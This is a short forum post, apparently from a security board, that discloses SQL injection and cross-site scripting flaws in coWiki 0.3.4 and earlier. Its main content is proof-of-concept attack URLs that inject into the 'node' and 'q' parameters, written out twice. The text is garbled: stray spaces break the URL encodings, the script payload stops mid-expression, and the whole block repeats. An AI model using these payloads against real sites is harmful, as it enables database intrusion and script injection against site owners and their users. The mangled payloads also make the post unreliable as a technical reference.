SQL Injection and XSS vulnerability in coWiki
Page 1 of 1
SQL Injection and XSS vulnerability in coWiki
SQL Injection:
http://site/index.php?node=-1 '% 20or% 20version ()% 3E'5
Vulnerable coWiki 0.3.4 and previous versions.
XSS:
Vulnerability in the main script in the parameter q.
http://site/?cmd=srchdoc&q =% 22% 3E% 3Cscript% 3Ealert (document
http://site/index.php?node=-1 '% 20or% 20version ()% 3E'5
Vulnerable coWiki 0.3.4 and previous versions.
XSS:
Vulnerability in the main script in the parameter q.
http://site/?cmd=srchdoc&q =% 22% 3E% 3Cscript% 3Ealert (document
andry- Moderator
- Posts : 467
Join date : 2010-05-07
Similar topics
» BaconMap 1.0 SQL Injection
» ANI Exploit + SQL injection
» SQL injection in wordpress
» Code execution through SQL Injection
» XSS, Command and SQL Injection vectors: Beyond the Form
» ANI Exploit + SQL injection
» SQL injection in wordpress
» Code execution through SQL Injection
» XSS, Command and SQL Injection vectors: Beyond the Form
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum